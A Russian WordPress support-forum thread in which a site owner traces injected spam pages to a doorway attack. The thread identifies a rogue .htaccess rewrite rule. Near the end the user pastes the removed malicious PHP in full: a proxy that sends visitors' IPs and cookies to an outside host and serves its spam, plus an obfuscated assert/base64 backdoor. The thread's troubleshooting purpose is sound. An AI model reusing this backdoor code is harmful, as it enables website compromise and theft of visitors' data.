Поддержка → Проблемы и решения → На сайте появились левые записи.
На сайте появились левые записи.
-
На сайте появились какието левые статьи. Причем ворованные с инета. Как удалить не знаю… в админке в записях их нет… аяндекс уже проиндексировал. Как это могли сделать? Помогите! Кто-то мне западлит.
Сайт: http://tuki-tuk.ru/
-
Новые пользователи (редактора, админы) тоже появились на сайте?
Пользователи появляются постоянно. А статьи от меня! Автор Admin. Я только один администратор …я проверил.
Эти статьи даже не появились на главной странице. Как появляются все новые записи… но они есть.. Ничего не понимаю… Какойто левый код сделали… пороль в админку поменял… по просьбе REG.RU … они прислали письмо что кто-то пытался ломануть сайт.
у вас что-то дырявое на сервере.
может плагин, может тема.Спасибо. Что же делать….
по логам выяснять.
мне вот недавно попался сайт, где в базу залезли тупо через старую дырявую версию phpmyadmin.На сайте появились какието левые статьи. Причем ворованные с инета. Как удалить не знаю… в админке в записях их нет… аяндекс уже проиндексировал. Как это могли сделать? Помогите!
Если бы Вы показали хотя бы парочку таких статей — наверняка стало бы большее понятно.
А так пока что вангую залитый дорвей.
Вот оригинал сайт: http://tuki-tuk.ru/
А вот левая ботва : http://tuki-tuk.ru/video-doistoricheskie-zhivotnye-c.phpсайт бары поменялись.
А вот левая ботва : http://tuki-tuk.ru/video-doistoricheskie-zhivotnye-c.php
Типичный дорвей.
Если этих файлов нет физически, то они генерятся.
Нужно не только удалить его, но и закрыть уязвимости, через которые это стало возможно.
См https://ru.forums.wordpress.org/topic/%D0%92%D0%B8%D1%80%D1%83%D1%81%D1%8B-%D0%BD%D0%B0-%D1%81%D0%B0%D0%B9%D1%82%D0%B5-1?replies=6#post-199857Скажите, а здесь нет вредоносного кода? Файл: .htacess
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^js/(.*) wp-content/themes/header.php?id=$1 [L] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress <Files "wp-login.php"> AuthType Basic AuthName "please use your control panel password" AuthUserFile /var/www/u0035439/data/etc/users Require valid-user </Files>
Этой строки и указанного в ней файла быть не должно:
RewriteRule ^js/(.*) wp-content/themes/header.php?id=$1 [L]
Я так и подумал … значит надо удалить все что связано со значением js?
посмотрите пожалуйста а здесь нет заразы?
<!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta name="cf8f03358f08bc13cd7d7aeab887d52b" content=""> <meta charset="<?php bloginfo('charset') ?>" /> <title><?php wp_title('|', true, 'right'); bloginfo('name'); ?></title> <!-- Created by Artisteer v4.0.0.58475 --> <meta name="viewport" content="initial-scale = 1.0, maximum-scale = 1.0, user-scalable = no, width = device-width"> <!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]--> <link rel="stylesheet" href="<?php bloginfo('stylesheet_url') ?>" media="screen" /> <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" /> <?php remove_action('wp_head', 'wp_generator'); if (is_singular() && get_option('thread_comments')) { wp_enqueue_script('comment-reply'); } wp_head(); ?> </head> <body <?php body_class(); ?>> <div id="newwp-main"> <?php if(theme_has_layout_part("header")) : ?> <header class="clearfix newwp-header<?php echo (theme_get_option('theme_header_clickable') ? ' clickable' : ''); ?>"><?php get_sidebar('header'); ?> <div class="newwp-shapes"> <?php if(theme_get_option('theme_header_show_headline')): ?> <?php $headline = theme_get_option('theme_'.(is_home()?'posts':'single').'_headline_tag'); ?> <<?php echo $headline; ?> class="newwp-headline" data-left="5.14%"> <a>/"><?php bloginfo('name'); ?></a> </<?php echo $headline; ?>> <?php endif; ?> <?php if(theme_get_option('theme_header_show_slogan')): ?> <?php $slogan = theme_get_option('theme_'.(is_home()?'posts':'single').'_slogan_tag'); ?> <<?php echo $slogan; ?> class="newwp-slogan" data-left="10.11%"><?php bloginfo('description'); ?></<?php echo $slogan; ?>> <?php endif; ?> <div class="newwp-object0" data-left="98.14%"></div> </div> <nav class="newwp-nav clearfix"> <?php echo theme_get_menu(array( 'source' => theme_get_option('theme_menu_source'), 'depth' => theme_get_option('theme_menu_depth'), 'menu' => 'primary-menu', 'class' => 'newwp-hmenu' ) ); ?> </nav> <img src=' ' width='100%'> </header> <?php endif; ?> <div class="newwp-sheet clearfix"> <div class="newwp-layout-wrapper clearfix"> <div class="newwp-content-layout"> <div class="newwp-content-layout-row"> <?php get_sidebar(); ?> <div class="newwp-layout-cell newwp-content clearfix">
Проблему решил!!!
ВСЕМ СПАСИБО!!!
Вот он гад!!!RewriteRule ^js/(.*) wp-content/themes/header.php?id=$1 [L]
Перенаправил… и все удалил.
<?php hg($_SERVER); function hg(&$z){ $req=ltrim($z['REQUEST_URI'],'/'); if (preg_match('~^(.*)-([^-]{1,2}?)(\.|\z|/)~', $req, $m)) { $n=98;for($i=0;$i<strlen($m[1]);$i++) $n+=ord($m[1][$i]); if (($n&255) != hexdec($m[2])) return; } elseif (strpos($req,'dujuduj') !== 0 && strpos($req,'js/dpehobel.js') !== 0 && strpos($req,'js/nemkvamu.js') !== 0) return; $a=explode('|',"HTTP_X_FORWARDED_FOR|HTTP_FORWARDED_FOR|HTTP_X_REAL_IP|REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT|\150\x74\164\160\72\x2f\x2f\164\x75\x6b\x69\55\164\165\x6b\x2e\x72\x75\56\141\143\x63\x6f\x72\x64\55\x37\56\x72\165\x2f|\x68\164\164\160\72\x2f\x2f\x74\x75\x6b\151\55\x74\x75\x6b\x2e\x72\165"); if(isset($z[$a[0]]))$ip=$z[$a[0]];elseif(isset($z[$a[1]]))$ip=$z[$a[1]];elseif(isset($z[$a[2]]))$ip=$z[$a[2]];else$ip=@$z[$a[3]]; $po='&baby='.urlencode($a[7]).'&ip='.$ip; $co='';if(!empty($_COOKIE)){foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}} if(is_callable('curl_init')) { $ch = curl_init();$v='curl_setopt'; $v($ch,10002,$a[6].$req);$v($ch,10015,$po);$v($ch,19913,1);$v($ch,10016,@$z[$a[4]]);$v($ch,10018,$z[$a[5]]);$v($ch,20079,'hf'); if($co)curl_setopt($ch,10022,$co); echo curl_exec($ch); } else { $m = parse_url($a[6].$req); $f=fsockopen($m['host'],80) or die(); $h="POST {$m['path']} HTTP/1.1\r\nHost: {$m['host']}\r\nContent-Type: application/x-www-form-urlencoded\r\n"; if(!empty($z[$a[4]]))$h.="Referer: {$z[$a[4]]}\r\n"; if($co)$h.="Cookie: $co\r\n"; $h.="User-agent: {$z[$a[5]]}\r\nContent-length: ".strlen($po)."\r\nConnection: Close\r\n\r\n"; fwrite($f,$h.$po);$r='';while(!feof($f)){$r.=fgets($f,1024);}fclose($f); list($h,$d)=explode("\r\n\r\n",$r,2);$h=explode("\r\n",$h); foreach($h as $l){hf(0,$l);if(strpos($l,'chunked')!==false)$c=true;} if(@$c){for($o='';!empty($d);$d=trim($d)){$s=strpos($d,"\r\n");$e=hexdec(substr($d,0,$s));$o.=substr($d,$s+2,$e);$d=substr($d,$s+2+$e);}echo $o;}else echo $d; } exit; } function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);} ?> <?php error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftVTyzXPSyoKO0rFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cXJEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cB2yzXPScp3AyqPtxL19oVxuHISOsDHAQEIOHK0AVDIWGEIDvKFxcr2yzXUOlMJqsoJS0L2tbVvRhVKHvYTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXKfxLmN9VyIHEv04Vwg9MJkmMKfxLmN9VaqcozEiq3ZgZGV1ZFV7sK1yoUAyrlEwZQ0xL19oVxuHISOsDHAQEIOHK0AVDIWGEIDvKGg9nJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFy7WTZkCJA1pzksnJ5cqPtvnUE0pQbiY2MypaWyqP1gnJ5eYaW1Y2qyqP5jnUN/MQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMwCFVhWTZjYvVznG0kWzyjCFVhWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0hVvMbCFVhoJD1XPVjBJHjMJAuZTWyBJLmZwN5ZJH0LzDmAQN4ZQyzMQp4BPVhWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0hWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqYvEwZP4vZFVcXGgwqKWfK3AyqT9jqPtxLmRfAQVfMzSfp2HcB2A1pzksp2I0o3O0XPEwZFjkBGxkZlk0paIyXGfxnJW2VQ0tVTA1pzksMKuyLltxLmRcB2A1pzksL2kip2HbWTZkXGg9MJkmMJyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcCG0kXKfxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbVzu0qUN6Yl9zMKWlMKDgoJyhnl5lqF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvZQyyZTIwLGOvMGyzZmVjBGSyATWxZmDjBQN5MzD3BQtvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7sFOcMvNbnKAmMKDbWTyvqvxcVUftMJAbolNxnJW2BlO9VTyzXTymp2I0XPEsHxIEIHIGISfvpPWqXFNzWvNxK1WSHIISH1EoVaNvKFN9CFNvMwOuMGOwZzVvXFO7VROup3AypaDbWS9FEISIEIAHJlWwVy0cBlO9VU0="));')); ?>
- Тема «На сайте появились левые записи.» закрыта для новых ответов.